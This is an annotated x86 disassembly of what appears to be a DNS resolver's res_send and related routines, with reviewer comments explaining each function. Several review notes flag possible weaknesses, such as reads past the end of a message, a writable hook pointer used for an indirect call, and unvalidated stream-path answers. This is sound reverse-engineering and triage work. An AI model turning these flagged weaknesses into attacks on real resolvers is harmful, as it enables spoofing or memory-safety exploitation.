        movzx eax, byte ptr [ebx+1]
        mov ecx, dword_8078FA0
        test byte ptr [ecx+eax*2+1], 20h
        jnz short loc_804E5F8
        lea edx, [ebx+2]
        cmp byte ptr [ebx+2], 0
        jz short loc_804E5F8
        movzx eax, byte ptr [ebx+2]
        test byte ptr [ecx+eax*2+1], 20h
        jnz short loc_804E5F8
        lea esi, [esi]
loc_804E5E8: ; CODE XREF: sub_804E490+166j
        inc edx
        cmp byte ptr [edx], 0
        jz short loc_804E5F8
        movzx eax, byte ptr [edx]
        test byte ptr [ecx+eax*2+1], 20h
        jz short loc_804E5E8
loc_804E5F8: ; CODE XREF: sub_804E490+12Fj
             ; sub_804E490+140j ...
        mov byte ptr [edx], 0
        mov ds:byte_807A857, 0
        push 0FFh
        push ebx
        push offset unk_807A758
        call strncpy
        push edi
        call fclose
        mov eax, offset unk_807A758
        jmp short loc_804E628
; ---------------------------------------------------------------------------
        align 4
loc_804E620: ; CODE XREF: sub_804E490+7Bj
             ; sub_804E490+8Ej ...
        push edi
        call fclose
loc_804E626: ; CODE XREF: sub_804E490+13j
             ; sub_804E490+28j ...
        xor eax, eax
loc_804E628: ; CODE XREF: sub_804E490+18Dj
        lea esp, [ebp+var_410]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E490 endp
; ---------------------------------------------------------------------------
        db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E638 -- debug-only error report that includes a peer address.
;   arg_0 stream, arg_4 label string, arg_8 error number; arg_E and arg_10
;   are a 16-bit value (byte-swapped before printing) and a 32-bit value
;   passed to sub_805E984 -- presumably the port and address of a
;   sockaddr_in passed by value, with sub_805E984 = inet_ntoa and
;   sub_80566A4 = strerror.
;   Prints only when bit 2 of dword_807854C is set; __errno is saved on entry
;   and restored on exit, so callers' errno survives the call.
sub_804E638 proc near ; CODE XREF: sub_804EA0C+256p
                      ; sub_804EA0C+645p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_E = word ptr 16h
arg_10 = dword ptr 18h
        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0]
        mov esi, [ebp+arg_4]
        mov eax, [ebp+arg_8]
        mov ebx, __errno
        test byte ptr dword_807854C, 2
        jz short loc_804E682
        push eax
        call sub_80566A4
        push eax
        mov ax, [ebp+arg_E]
        xchg al, ah
        and eax, 0FFFFh
        push eax
        mov eax, [ebp+arg_10]
        push eax
        call sub_805E984
        add esp, 4
        push eax
        push esi
        push offset aRes_sendSS_US ; "res_send: %s ([%s].%u): %s\n"
        push edi
        call fprintf
loc_804E682: ; CODE XREF: sub_804E638+1Cj
        mov __errno, ebx
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E638 endp
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
sub_804E694 proc near ; CODE XREF: sub_804EA0C+2D4p
                      ; sub_804EA0C+350p ...
; Body of sub_804E694 (its "proc near" line immediately precedes this point):
; debug-only error report without an address. arg_0 stream, arg_4 label,
; arg_8 error number. Prints "res_send: %s: %s\n" only when bit 2 of
; dword_807854C is set; __errno is saved on entry and restored on exit.
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
        push ebp
        mov ebp, esp
        push edi
        push esi
        push ebx
        mov edi, [ebp+arg_0]
        mov esi, [ebp+arg_4]
        mov eax, [ebp+arg_8]
        mov ebx, __errno
        test byte ptr dword_807854C, 2
        jz short loc_804E6C5
        push eax
        call sub_80566A4
        push eax
        push esi
        push offset aRes_sendSS ; "res_send: %s: %s\n"
        push edi
        call fprintf
loc_804E6C5: ; CODE XREF: sub_804E694+1Cj
        mov __errno, ebx
        lea esp, [ebp+var_C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E694 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E6D8 -- stores arg_0 in dword_807853C. sub_804EA0C calls through that
; pointer before sending a query, so this is a hook setter. No CODE XREF is
; listed on the proc line, i.e. the disassembler found no direct caller.
; NOTE(review): dword_807853C is a writable global used for an indirect call;
; when triaging, check whether anything else in the binary writes it.
sub_804E6D8 proc near
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_0]
        mov dword_807853C, eax
        mov esp, ebp
        pop ebp
        retn
sub_804E6D8 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E6E8 -- stores arg_0 in dword_8078540, the pointer sub_804EA0C calls
; after an answer has been accepted. As with sub_804E6D8, no CODE XREF is
; listed on the proc line.
sub_804E6E8 proc near
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        mov eax, [ebp+arg_0]
        mov dword_8078540, eax
        mov esp, ebp
        pop ebp
        retn
sub_804E6E8 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E6F8 -- checks whether a 16-byte address record matches one of the
; configured entries (presumably the resolver's res_isourserver()).
;   arg_0: pointer to a 16-byte record, copied into var_10..var_4.
;   The table starts at dword_8078554, uses 10h-byte entries and has
;   dword_8078550 entries. An entry matches when its first dword equals the
;   record's first dword AND its second dword is either 0 or equal to the
;   record's second dword (presumably family+port, then IPv4 address, with
;   0 acting as a wildcard address).
;   Returns 1 on a match, 0 otherwise.
; The compiler unrolled the loop four times; the code from (count & 3)
; down to loc_804E7D7 handles the remainder before the main loop at
; loc_804E7F8.
sub_804E6F8 proc near ; CODE XREF: sub_804EA0C+808p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
        push ebp
        mov ebp, esp
        sub esp, 20h
        push edi
        push esi
        push ebx
        mov edx, [ebp+arg_0]
        mov ecx, [edx]
        mov [ebp+var_10], ecx
        mov eax, [edx+4]
        mov [ebp+var_C], eax
        mov eax, [edx+8]
        mov [ebp+var_8], eax
        mov eax, [edx+0Ch]
        mov [ebp+var_4], eax
        xor esi, esi ; esi = result, 0 until a match is found
        mov [ebp+var_14], 0 ; var_14 = entry index
        cmp dword_8078550, esi
        jle loc_804E875
        mov [ebp+var_18], ecx ; var_18 = first dword of the record
        mov ecx, offset dword_8078558 ; ecx walks the second dword of each entry
        mov [ebp+var_1C], offset dword_8078554 ; var_1C walks the first dword
        mov eax, dword_8078550
        and eax, 3
        cmp dword_8078550, esi
        jle short loc_804E7B9
        test eax, eax
        jz loc_804E7F0
        cmp eax, 1
        jle short loc_804E7B9
        cmp eax, 2
        jle short loc_804E791
        mov ebx, [ebp+var_18]
        cmp dword_8078554, ebx
        jnz short loc_804E787
        cmp dword_8078558, 0
        jz loc_804E859
        mov eax, dword_8078558
        cmp [ebp+var_C], eax
        jz loc_804E859
loc_804E787: ; CODE XREF: sub_804E6F8+72j
        add ecx, 10h
        add [ebp+var_1C], 10h
        inc [ebp+var_14]
loc_804E791: ; CODE XREF: sub_804E6F8+67j
        mov ebx, [ebp+var_18]
        mov edi, [ebp+var_1C]
        cmp [edi], ebx
        jnz short loc_804E7AF
        cmp dword ptr [ecx], 0
        jz loc_804E859
        mov eax, [ecx]
        cmp [ebp+var_C], eax
        jz loc_804E859
loc_804E7AF: ; CODE XREF: sub_804E6F8+A1j
        add ecx, 10h
        add [ebp+var_1C], 10h
        inc [ebp+var_14]
loc_804E7B9: ; CODE XREF: sub_804E6F8+55j
             ; sub_804E6F8+62j
        mov ebx, [ebp+var_18]
        mov edi, [ebp+var_1C]
        cmp [edi], ebx
        jnz short loc_804E7D7
        cmp dword ptr [ecx], 0
        jz loc_804E859
        mov eax, [ecx]
        cmp [ebp+var_C], eax
        jz loc_804E859
loc_804E7D7: ; CODE XREF: sub_804E6F8+C9j
        add ecx, 10h
        add [ebp+var_1C], 10h
        inc [ebp+var_14]
        mov edi, [ebp+var_14]
        cmp dword_8078550, edi
        jz loc_804E875
loc_804E7F0: ; CODE XREF: sub_804E6F8+59j
        mov [ebp+var_20], ecx
        mov edx, ecx
        mov ecx, [ebp+var_1C]
loc_804E7F8: ; CODE XREF: sub_804E6F8+17Bj
        ; Main loop: four entries per iteration (offsets 0, 10h, 20h, 30h).
        mov ebx, [ebp+var_18]
        cmp [ecx], ebx
        jnz short loc_804E80E
        cmp dword ptr [edx], 0
        jz short loc_804E859
        mov edi, [ebp+var_20]
        mov eax, [edi]
        cmp [ebp+var_C], eax
        jz short loc_804E859
loc_804E80E: ; CODE XREF: sub_804E6F8+105j
        mov ebx, [ebp+var_18]
        cmp [ecx+10h], ebx
        jnz short loc_804E827
        cmp dword ptr [edx+10h], 0
        jz short loc_804E859
        mov edi, [ebp+var_20]
        mov eax, [edi+10h]
        cmp [ebp+var_C], eax
        jz short loc_804E859
loc_804E827: ; CODE XREF: sub_804E6F8+11Cj
        mov ebx, [ebp+var_18]
        cmp [ecx+20h], ebx
        jnz short loc_804E840
        cmp dword ptr [edx+20h], 0
        jz short loc_804E859
        mov edi, [ebp+var_20]
        mov eax, [edi+20h]
        cmp [ebp+var_C], eax
        jz short loc_804E859
loc_804E840: ; CODE XREF: sub_804E6F8+135j
        mov ebx, [ebp+var_18]
        cmp [ecx+30h], ebx
        jnz short loc_804E85C
        cmp dword ptr [edx+30h], 0
        jz short loc_804E859
        mov edi, [ebp+var_20]
        mov eax, [edi+30h]
        cmp [ebp+var_C], eax
        jnz short loc_804E85C
loc_804E859: ; CODE XREF: sub_804E6F8+7Bj
             ; sub_804E6F8+89j ...
        inc esi ; match found
        jmp short loc_804E875
; ---------------------------------------------------------------------------
loc_804E85C: ; CODE XREF: sub_804E6F8+14Ej
             ; sub_804E6F8+15Fj
        add [ebp+var_20], 40h
        add edx, 40h
        add ecx, 40h
        add [ebp+var_14], 4
        mov ebx, [ebp+var_14]
        cmp dword_8078550, ebx
        jnz short loc_804E7F8
loc_804E875: ; CODE XREF: sub_804E6F8+32j
             ; sub_804E6F8+F2j ...
        mov eax, esi
        lea esp, [ebp+var_2C]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E6F8 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E884 -- looks for a (name, value, value) triple in the question
; section of a message (presumably the resolver's res_nameinquery()).
;   arg_0 name to find; arg_4 / arg_8 are compared with the two 16-bit fields
;   that follow each question name (presumably type and class);
;   arg_C start of the message, arg_10 end-of-message pointer.
;   The entry count is the big-endian 16-bit field at [arg_C+4]; the first
;   question starts at arg_C+0Ch.
;   Returns 1 if found, 0 if not, 0FFFFFFFFh if sub_804D02C fails.
; sub_804D02C is called as (msg, end, cursor, outbuf, 101h) and returns the
; number of bytes consumed -- presumably dn_expand; var_104 (104h bytes) is
; large enough for the 101h limit passed to it.
sub_804E884 proc near ; CODE XREF: sub_804E944+A2p
var_114 = byte ptr -114h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
        push ebp
        mov ebp, esp
        sub esp, 108h
        push edi
        push esi
        push ebx
        mov esi, [ebp+arg_C]
        add esi, 0Ch
        mov edx, [ebp+arg_C]
        mov ax, [edx+4]
        xchg al, ah
        movzx edi, ax
        mov eax, edi
        dec edi
        test eax, eax
        jle loc_804E933
        lea edx, [ebp+var_104]
        mov [ebp+var_108], edx
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804E8BC: ; CODE XREF: sub_804E884+ADj
        push 101h
        mov edx, [ebp+var_108]
        push edx
        push esi
        mov edx, [ebp+arg_10]
        push edx
        mov edx, [ebp+arg_C]
        push edx
        call sub_804D02C
        add esp, 14h
        test eax, eax
        jge short loc_804E8E4
        mov eax, 0FFFFFFFFh
        jmp short loc_804E935
; ---------------------------------------------------------------------------
loc_804E8E4: ; CODE XREF: sub_804E884+57j
        ; NOTE(review): the two 16-bit reads below advance esi by 4 without
        ; comparing it against the end pointer in arg_10. Unless sub_804D02C
        ; guarantees four more bytes, a truncated question section is read
        ; past the end of the message -- confirm against the library source.
        add esi, eax
        push esi
        call sub_804D6B8
        movzx ebx, ax
        add esi, 2
        push esi
        call sub_804D6B8
        and eax, 0FFFFh
        add esi, 2
        add esp, 8
        cmp [ebp+arg_4], ebx
        jnz short loc_804E92C
        cmp [ebp+arg_8], eax
        jnz short loc_804E92C
        mov edx, [ebp+arg_0]
        push edx
        mov edx, [ebp+var_108]
        push edx
        call sub_80565F8
        add esp, 8
        test eax, eax
        jnz short loc_804E92C
        mov eax, 1
        jmp short loc_804E935
; ---------------------------------------------------------------------------
; (continuation of sub_804E884: loop tail and epilogue)
        align 4
loc_804E92C: ; CODE XREF: sub_804E884+82j
             ; sub_804E884+87j ...
        mov eax, edi
        dec edi
        test eax, eax
        jg short loc_804E8BC
loc_804E933: ; CODE XREF: sub_804E884+23j
        xor eax, eax
loc_804E935: ; CODE XREF: sub_804E884+5Ej
             ; sub_804E884+A5j
        lea esp, [ebp+var_114]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E884 endp
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804E944 -- checks that every question in message 1 also appears in
; message 2 (presumably the resolver's res_queriesmatch()).
;   arg_0 / arg_4: start and end of message 1; arg_8 / arg_C: start and end
;   of message 2. The big-endian counts at offset 4 of both must be equal.
;   Returns 1 if all questions match, 0 if not, 0FFFFFFFFh when sub_804D02C
;   fails on message 1.
; NOTE(review): as in sub_804E884, the two 16-bit reads after sub_804D02C are
; not checked against the end pointer (arg_4) -- confirm.
; NOTE(review): the only call site shown (sub_804EA0C+853) tests this result
; for zero only, so the 0FFFFFFFFh failure value is treated like a match
; there.
sub_804E944 proc near ; CODE XREF: sub_804EA0C+853p
var_114 = byte ptr -114h
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
        push ebp
        mov ebp, esp
        sub esp, 108h
        push edi
        push esi
        push ebx
        mov esi, [ebp+arg_0]
        add esi, 0Ch
        mov edx, [ebp+arg_0]
        mov ax, [edx+4]
        xchg al, ah
        movzx edi, ax
        mov edx, [ebp+arg_8]
        mov ax, [edx+4]
        xchg al, ah
        and eax, 0FFFFh
        cmp edi, eax
        jz short loc_804E984
loc_804E974: ; CODE XREF: sub_804E944+ACj
        xor eax, eax
        jmp loc_804E9FE
; ---------------------------------------------------------------------------
        align 4
loc_804E97C: ; CODE XREF: sub_804E944+73j
        mov eax, 0FFFFFFFFh
        jmp short loc_804E9FE
; ---------------------------------------------------------------------------
        align 4
loc_804E984: ; CODE XREF: sub_804E944+2Ej
        mov eax, edi
        dec edi
        test eax, eax
        jle short loc_804E9F9
        lea edx, [ebp+var_104]
        mov [ebp+var_108], edx
        nop
loc_804E998: ; CODE XREF: sub_804E944+B3j
        push 101h
        mov edx, [ebp+var_108]
        push edx
        push esi
        mov edx, [ebp+arg_4]
        push edx
        mov edx, [ebp+arg_0]
        push edx
        call sub_804D02C
        add esp, 14h
        test eax, eax
        jl short loc_804E97C
        add esi, eax
        push esi
        call sub_804D6B8
        movzx ebx, ax
        add esi, 2
        push esi
        call sub_804D6B8
        and eax, 0FFFFh
        add esi, 2
        mov edx, [ebp+arg_C]
        push edx
        mov edx, [ebp+arg_8]
        push edx
        push eax
        push ebx
        mov edx, [ebp+var_108]
        push edx
        call sub_804E884
        add esp, 1Ch
        test eax, eax
        jz short loc_804E974
        mov eax, edi
        dec edi
        test eax, eax
        jg short loc_804E998
loc_804E9F9: ; CODE XREF: sub_804E944+45j
        mov eax, 1
loc_804E9FE: ; CODE XREF: sub_804E944+32j
             ; sub_804E944+3Dj
        lea esp, [ebp+var_114]
        pop ebx
        pop esi
        pop edi
        mov esp, ebp
        pop ebp
        retn
sub_804E944 endp
; ---------------------------------------------------------------------------
        align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; sub_804EA0C -- sends a query to the configured servers and collects the
; answer; the debug strings below name it res_send, so this is presumably the
; resolver's res_send() (library code, called from sub_804DFE0).
;   arg_0 query buffer, arg_4 query length,
;   arg_8 answer buffer, arg_C answer buffer size.
;   Returns the answer length (var_8) on success, 0FFFFFFFFh on failure.
; Locals, as used in this routine:
;   var_4   pointer to the current 10h-byte server entry (dword_8078554 + 16*i)
;   var_8   length of the received answer
;   var_1A  16-bit length / remaining-byte counter on the stream path
;   var_21C scratch area: 20h-byte descriptor set for select, and the 200h-byte
;           discard buffer for oversized stream answers
;   var_224/var_220 timeout passed to select (seconds / sub-second field)
;   var_22C, var_230 copies of arg_0 and arg_8 (message header pointers)
;   var_234 set once some server produced a reply or a timeout
;   var_238 set after one retry following errno 68h on the stream path
;   var_23C errno to report on exit (starts at 6Eh)
;   var_240 retry pass counter, var_244 stream-mode flag,
;   var_248 bit mask of servers already marked bad, var_24C truncation flag
; Globals (presumed roles): dword_8078530 socket descriptor, dword_8078538 /
; dword_8078534 "connected" flags for stream / datagram use, dword_8078548
; retry count, dword_8078550 server count, dword_8078544 base timeout.
sub_804EA0C proc near ; CODE XREF: sub_804DFE0+B8p
var_264 = byte ptr -264h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_1FC = byte ptr -1FCh
var_1EC = word ptr -1ECh
var_1EA = word ptr -1EAh
var_1E8 = dword ptr -1E8h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
        push ebp
        mov ebp, esp
        sub esp, 258h
        push edi
        push esi
        push ebx
        mov eax, [ebp+arg_0]
        mov [ebp+var_22C], eax
        mov ecx, [ebp+arg_8]
        mov [ebp+var_230], ecx
        test byte ptr dword_807854C, 1
        jnz short loc_804EA41
        call res_init
        cmp eax, 0FFFFFFFFh
        jz loc_804F4E4 ; default
loc_804EA41: ; CODE XREF: sub_804EA0C+25j
        ; Debug dump of the outgoing query (bit 2 of dword_807854C, or
        ; bit 1000h of dword_80786A4).
        test byte ptr dword_807854C, 2
        jnz short loc_804EA53
        test byte ptr dword_80786A4+1, 10h
        jz short loc_804EA77
loc_804EA53: ; CODE XREF: sub_804EA0C+3Cj
        push offset aRes_send ; ";; res_send()\n"
        push offset unk_8078750
        call fprintf
        push offset unk_8078750
        mov eax, [ebp+arg_4]
        push eax
        mov eax, [ebp+arg_0]
        push eax
        call sub_805F1DC
        add esp, 14h
loc_804EA77: ; CODE XREF: sub_804EA0C+45j
        ; Stream mode is selected when bit 8 of dword_807854C is set or the
        ; query is longer than 200h bytes.
        mov [ebp+var_244], 0
        test byte ptr dword_807854C, 8
        jnz short loc_804EA93
        cmp [ebp+arg_4], 200h
        jle short loc_804EA9D
loc_804EA93: ; CODE XREF: sub_804EA0C+7Cj
        mov [ebp+var_244], 1
loc_804EA9D: ; CODE XREF: sub_804EA0C+85j
        mov [ebp+var_234], 0
        mov [ebp+var_238], 0
        mov [ebp+var_23C], 6Eh ; 110, ETIMEDOUT on Linux/i386
        mov [ebp+var_248], 0
        mov [ebp+var_240], 0
        mov edi, [ebp+var_234]
        cmp dword_8078548, edi
        jle loc_804F475
        db 8Dh,76h,0 ; lea esi, [esi+0]
loc_804EAE4: ; CODE XREF: sub_804EA0C+A63j
        ; Outer loop: one pass per retry; inner loop: esi = server index.
        xor esi, esi
        cmp dword_8078550, esi
        jle loc_804F45D
        lea esi, [esi]
loc_804EAF4: ; CODE XREF: sub_804EA0C+A4Bj
        mov eax, esi
        shl eax, 4
        add eax, offset dword_8078554
        mov [ebp+var_4], eax
loc_804EB01: ; CODE XREF: sub_804EA0C+386j
             ; sub_804EA0C+946j
        ; Skip servers whose bit is already set in the bad-server mask.
        mov eax, [ebp+var_248]
        bt eax, esi
        jnb short loc_804EB18
loc_804EB0C: ; CODE XREF: sub_804EA0C+146j
             ; sub_804EA0C+364j ...
        call sub_804F4F8 ; case 0x1
        jmp loc_804F450
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_804EB18: ; CODE XREF: sub_804EA0C+FEj
        ; Optional pre-send hook: an indirect call through dword_807853C (set
        ; by sub_804E6D8) with pointers to the server entry, query buffer and
        ; query length, so the hook can rewrite them. Its result selects:
        ;   0 proceed, 1 next server, 2 call the hook again (gives up with an
        ;   error once ebx exceeds 29h), 3 return var_8, 4 or more: error.
        cmp dword_807853C, 0
        jz short loc_804EB80 ; case 0x0
        xor ebx, ebx
        nop
loc_804EB24: ; CODE XREF: sub_804EA0C+172j
        lea ecx, [ebp+var_8]
        push ecx
        mov edi, [ebp+arg_C]
        push edi
        mov eax, [ebp+arg_8]
        push eax
        lea ecx, [ebp+arg_4]
        push ecx
        lea edi, [ebp+arg_0]
        push edi
        lea eax, [ebp+var_4]
        push eax
        mov ecx, dword_807853C
        call ecx
        mov edx, eax
        add esp, 18h
        cmp edx, 4 ; switch 5 cases
        ja loc_804F4E4 ; default
        jmp ds:off_804EB5C[edx*4] ; switch jump
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
off_804EB5C dd offset loc_804EB80, offset loc_804EB0C, offset loc_804EB70 ; DATA XREF: sub_804EA0C+146r
        dd offset loc_804F448, offset loc_804F4E4 ; jump table for switch statement
; ---------------------------------------------------------------------------
loc_804EB70: ; CODE XREF: sub_804EA0C+146j
             ; DATA XREF: sub_804EA0C+150o
        inc ebx ; case 0x2
        cmp ebx, 29h
        jg loc_804F4E4 ; default
        xor edi, edi
        test edi, edi
        jz short loc_804EB24
loc_804EB80: ; CODE XREF: sub_804EA0C+113j
             ; sub_804EA0C+146j
             ; DATA XREF: ...
; (continuation of sub_804EA0C at loc_804EB80: per-server send path)
        test byte ptr dword_807854C, 2 ; case 0x0
        jz short loc_804EBAC
        mov eax, [ebp+var_4]
        mov eax, [eax+4]
        push eax
        call sub_805E984
        push eax
        lea eax, [esi+1]
        push eax
        push offset aQueryingServer ; ";; Querying server (# %d) address = %s\n"...
        push offset unk_8078750
        call fprintf
        add esp, 14h
loc_804EBAC: ; CODE XREF: sub_804EA0C+17Bj
        ; var_244 == 0 -> datagram path at loc_804EEC0; otherwise stream path.
        cmp [ebp+var_244], 0
        jz loc_804EEC0
        ; Stream path: force this to be the last retry pass.
        mov eax, dword_8078548
        mov [ebp+var_240], eax
        mov [ebp+var_24C], 0
        ; Reuse the descriptor only if it is open and flagged as a connected
        ; stream; otherwise close it (sub_804F4F8) and open a new one.
        cmp dword_8078530, 0
        jl short loc_804EBF2
        cmp dword_8078538, 0
        jnz loc_804EC86
        cmp dword_8078530, 0
        jl short loc_804EBF2
        call sub_804F4F8
loc_804EBF2: ; CODE XREF: sub_804EA0C+1C9j
             ; sub_804EA0C+1DFj
        ; socket(2, 1, 0): AF_INET, SOCK_STREAM on Linux.
        push 0
        push 1
        push 2
        call socket
        mov edx, eax
        mov dword_8078530, edx
        add esp, 0Ch
        test edx, edx
        jl loc_804F4A4
        mov __errno, 0
        push 10h
        mov eax, [ebp+var_4]
        push eax
        push edx
        call connect
        add esp, 0Ch
        test eax, eax
        jge short loc_804EC7C
        ; connect failed: remember errno, log the 10h-byte server entry by
        ; value, mark this server bad in var_248 and move on.
        mov ecx, __errno
        mov [ebp+var_23C], ecx
        mov edx, [ebp+var_4]
        mov edi, [edx+0Ch]
        push edi
        mov eax, [edx+8]
        push eax
        mov ecx, [edx+4]
        push ecx
        mov edx, [edx]
        mov [ebp+var_250], edx
        push edx
        mov edi, [ebp+var_23C]
        push edi
        push offset aConnectVc ; "connect/vc"
        push offset unk_80787A4
        call sub_804E638
        mov edi, 1
        mov ecx, esi
        shl edi, cl
        or [ebp+var_248], edi
        jmp loc_804F065
; ---------------------------------------------------------------------------
        align 4
loc_804EC7C: ; CODE XREF: sub_804EA0C+21Fj
        mov dword_8078538, 1
loc_804EC86: ; CODE XREF: sub_804EA0C+1D2j
        ; Send a 2-byte length prefix followed by the query in one gathered
        ; write: var_18..var_C form two (pointer, length) pairs and
        ; sub_8056E70 is called as (fd, pairs, 2) -- presumably writev, with
        ; sub_804D700 storing the 16-bit length into var_1A.
        lea ebx, [ebp+var_1A]
        push ebx
        movzx eax, word ptr [ebp+arg_4]
        push eax
        call sub_804D700
        mov [ebp+var_18], ebx
        mov [ebp+var_14], 2
        mov eax, [ebp+arg_0]
        mov [ebp+var_10], eax
        mov eax, [ebp+arg_4]
        mov [ebp+var_C], eax
        push 2
        lea eax, [ebp+var_18]
        push eax
        mov eax, dword_8078530
        push eax
        call sub_8056E70
        mov edx, eax
        mov eax, [ebp+arg_4]
        add eax, 2
        add esp, 14h
        ; Anything other than a complete write (length + 2) is a failure.
        cmp edx, eax
        jz short loc_804ECFC
        mov eax, __errno
        mov [ebp+var_23C], eax
        push eax
        push offset aWriteFailed ; "write failed"
        push offset unk_80787A4
        call sub_804E694
        mov edi, 1
        mov ecx, esi
        shl edi, cl
        or [ebp+var_248], edi
        jmp loc_804F19D
; ---------------------------------------------------------------------------
; (continuation of sub_804EA0C: receive paths and answer validation)
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804ECFC: ; CODE XREF: sub_804EA0C+2BCj
        ; Stream receive, step 1: read the 2-byte length prefix. It is read
        ; into the start of the caller's answer buffer (arg_8).
        mov eax, [ebp+arg_8]
        mov [ebp+var_254], eax
        mov [ebp+var_1A], 2
        nop
loc_804ED0C: ; CODE XREF: sub_804EA0C+333j
        movzx ecx, [ebp+var_1A]
        push ecx
        mov edi, [ebp+var_254]
        push edi
        mov eax, dword_8078530
        push eax
        call read
        mov ebx, eax
        add esp, 0Ch
        test ebx, ebx
        jle short loc_804ED45
        add edi, ebx
        mov [ebp+var_254], edi
        mov ax, [ebp+var_1A]
        sub ax, bx
        mov [ebp+var_1A], ax
        jnz short loc_804ED0C
        test ebx, ebx
        jg short loc_804ED98
loc_804ED45: ; CODE XREF: sub_804EA0C+31Ej
        mov ecx, __errno
        mov [ebp+var_23C], ecx
        push ecx
        push offset aReadFailed ; "read failed"
        push offset unk_80787A4
        call sub_804E694
        call sub_804F4F8
        add esp, 0Ch
        ; errno 68h (104, ECONNRESET on Linux/i386) earns exactly one retry
        ; against the same server; var_238 records that it has been used.
        cmp [ebp+var_23C], 68h
        jnz loc_804EB0C ; case 0x1
        cmp [ebp+var_238], 0
        jnz loc_804EB0C ; case 0x1
        mov [ebp+var_238], 1
        call sub_804F4F8
        jmp loc_804EB01
; ---------------------------------------------------------------------------
        align 4
loc_804ED98: ; CODE XREF: sub_804EA0C+337j
        ; Step 2: decode the peer-supplied length (16 bits) into var_8 and
        ; clamp the amount actually stored to the caller's buffer size.
        ; NOTE(review): no lower bound is applied to the length here, and the
        ; stream path reaches loc_804F358 without the ID / sender / question
        ; checks used on the datagram path -- callers must validate the
        ; returned length themselves; confirm in sub_804DFE0.
        mov edi, [ebp+arg_8]
        push edi
        call sub_804D6B8
        mov edx, eax
        and edx, 0FFFFh
        mov [ebp+var_8], edx
        add esp, 4
        mov eax, [ebp+arg_C]
        cmp edx, eax
        jle short loc_804EDE8
        test byte ptr dword_807854C, 2
        jz short loc_804EDD1
        push offset aResponseTrunca ; ";; response truncated\n"
        push offset unk_8078750
        call fprintf
        add esp, 8
loc_804EDD1: ; CODE XREF: sub_804EA0C+3B1j
        mov [ebp+var_24C], 1
        mov cx, word ptr [ebp+arg_C]
        mov [ebp+var_1A], cx
        jmp short loc_804EDF0
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; ---------------------------------------------------------------------------
loc_804EDE8: ; CODE XREF: sub_804EA0C+3A8j
        mov ax, word ptr [ebp+var_8]
        mov [ebp+var_1A], ax
loc_804EDF0: ; CODE XREF: sub_804EA0C+3D7j
        ; Step 3: read var_1A bytes of answer into arg_8.
        mov edi, [ebp+arg_8]
        mov [ebp+var_254], edi
        cmp [ebp+var_1A], 0
        jz short loc_804EE34
loc_804EE00: ; CODE XREF: sub_804EA0C+426j
        movzx eax, [ebp+var_1A]
        push eax
        mov ecx, [ebp+var_254]
        push ecx
        mov edi, dword_8078530
        push edi
        call read
        mov ebx, eax
        add esp, 0Ch
        test ebx, ebx
        jle short loc_804EE38
        add [ebp+var_254], ebx
        mov ax, [ebp+var_1A]
        sub ax, bx
        mov [ebp+var_1A], ax
        jnz short loc_804EE00
loc_804EE34: ; CODE XREF: sub_804EA0C+3F2j
        test ebx, ebx
